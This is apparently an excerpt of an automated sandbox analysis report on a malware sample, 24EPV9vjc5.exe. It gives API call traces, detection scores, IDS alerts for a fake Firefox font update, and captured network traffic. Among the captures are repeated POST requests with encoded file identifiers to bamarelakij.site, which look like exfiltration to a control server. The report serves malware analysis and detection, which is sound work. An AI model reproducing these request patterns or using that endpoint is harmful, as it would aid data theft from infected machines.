SetLastError.KERNEL32(00000008), ref: 5BB3EBCE
newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3EBDE

Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242

BuildCommDCBA.KERNEL32(00000000,?), ref: 5BB3EBF9
GlobalFree.KERNEL32(00000000), ref: 5BB3EC0C

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharFromMultiWide$BuildCommErrorFreeGlobalLast
String ID:
API String ID: 4064689889-0
Opcode ID: 2cf87441c1fdc0f2c5e709e05b10e42c50fec51e4941199853f120ae12a6626a
Instruction ID: 66abab8c7e1535f856746cbf6b9673e718472d6d819d40f5254c54d6cde24bf2
Opcode Fuzzy Hash: 2cf87441c1fdc0f2c5e709e05b10e42c50fec51e4941199853f120ae12a6626a
Instruction Fuzzy Hash: 01F0A9B5900208EFDB01DFA4D489BDDBBB5FB04301F508559F905AB280D7F69A84EB65

Function 5BB3CF9F Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000008), ref: 5BB3CFB5
newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3CFC5

Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242

SetFileAttributesA.KERNEL32(00000000,?), ref: 5BB3CFE0
GlobalFree.KERNEL32(00000000), ref: 5BB3CFF3

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharFromMultiWide$AttributesErrorFileFreeGlobalLast
String ID:
API String ID: 3187813303-0
Opcode ID: 8ff9a0fde598f3c7797b3ebd963561f9482c9414ad01d04c88dc2cd2cfa20510
Instruction ID: adafb9b8c4b08c4cddb16dacd5f7d1431cc2158b52c0befcf79a861fce84e049
Opcode Fuzzy Hash: 8ff9a0fde598f3c7797b3ebd963561f9482c9414ad01d04c88dc2cd2cfa20510
Instruction Fuzzy Hash: 19F09CB6900208EFDB00DFE4D449B9DBBB5FB08301F208159E505A7284D7B69688DB95

Source: C:\Users\user\AppData\Local\Temp\cooisyadg	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\fffwkwbrsb	ReversingLabs: Detection: 26%
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009AA0BB DecryptFileW,	1_2_009AA0BB
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009CFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	1_2_009CFA62
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 1_2_009A9E9E DecryptFileW,DecryptFileW,	1_2_009A9E9E
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B8A0BB DecryptFileW,	2_2_00B8A0BB
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00BAFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	2_2_00BAFA62
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Code function: 2_2_00B89E9E DecryptFileW,DecryptFileW,	2_2_00B89E9E

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49811 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49812 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49815 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49816 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49814 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49817 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49818 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49819 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49820 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49821 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49813 -> 172.67.174.91:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49822 -> 172.67.174.91:443

Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15Content-Length: 147Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 53Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 208Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b?rn=1736430155824&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0CF28CAF1D4764FC3C1D99C01CEF65B6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1736430155823&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8c5c06be53d4ef49888d26564492b1c&activityId=a8c5c06be53d4ef49888d26564492b1c&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1
Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430155821&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 3857sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /b2?rn=1736430155824&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0CF28CAF1D4764FC3C1D99C01CEF65B6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=157707f961a726cd94781461736430158; XID=157707f961a726cd94781461736430158
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1736430155823&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8c5c06be53d4ef49888d26564492b1c&activityId=a8c5c06be53d4ef49888d26564492b1c&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=23380C341E47475980EC0B27EFDB0DFE&MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1; SM=T; _C_ETH=1; msnup=
Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158155&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 11398sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1; _C_ETH=1; msnup=
Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158161&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5059sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1; _C_ETH=1; msnup=
Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158922&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5391sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1; msnup=
Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430159160&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9892sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1; msnup=
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 681979Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 745Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15Content-Length: 147Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 212Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 53Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 380Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 58769Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 58769Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 70618Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 70618Host: bamarelakij.site
Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 35Host: bamarelakij.site
